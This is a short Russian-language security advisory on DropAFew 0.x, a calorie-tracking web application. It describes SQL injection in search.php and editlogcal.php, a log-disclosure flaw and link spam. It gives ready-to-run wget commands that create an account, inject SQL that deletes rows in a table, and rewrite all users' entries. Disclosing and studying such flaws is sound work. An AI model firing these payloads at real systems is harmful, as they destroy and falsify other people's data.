Программа: DropAFew 0.x

Найденные уязвимости позволяют удаленному злоумышленнику выполнить произвольные SQL команды в базе данных приложения, получить конфиденциальную информацию и осуществить манипуляцию данных на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "id" сценарием search.php и search-pda.php (когда "action" установлено в значение "del"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

# создание нового пользователя
wget —save-cookies cookies —keep-session-cookies —post-data=’username=exploit&password=1&password_confirm=1′ http://[target]/calorie/newaccount2.php

# удаление таблицы foodfacts
wget —load-cookies cookies —post-data=’id=1%20OR%20id%20>%200—&action=del’ http://[target]/calorie/search.php

# make everyone have eaten 1000 strawberries, but hey, they were only 10
# calories …
wget —load-cookies cookies —post-data=’action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*’ http://[target]/calorie/editlogcal.php

2) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "id" сценарием editlogcal.php во время авторизации. Атакующий может получить содержимое log файлов других пользователей.

3) Уязвимость возникает из-за ошибки в links.php. Атакующий может через links.php добавить ссылки на публичные страницы других пользователей, которые не могут быть удалены пользователем, что позволит «заспамить» Web сайт нежелательной информацией.



Оставить мнение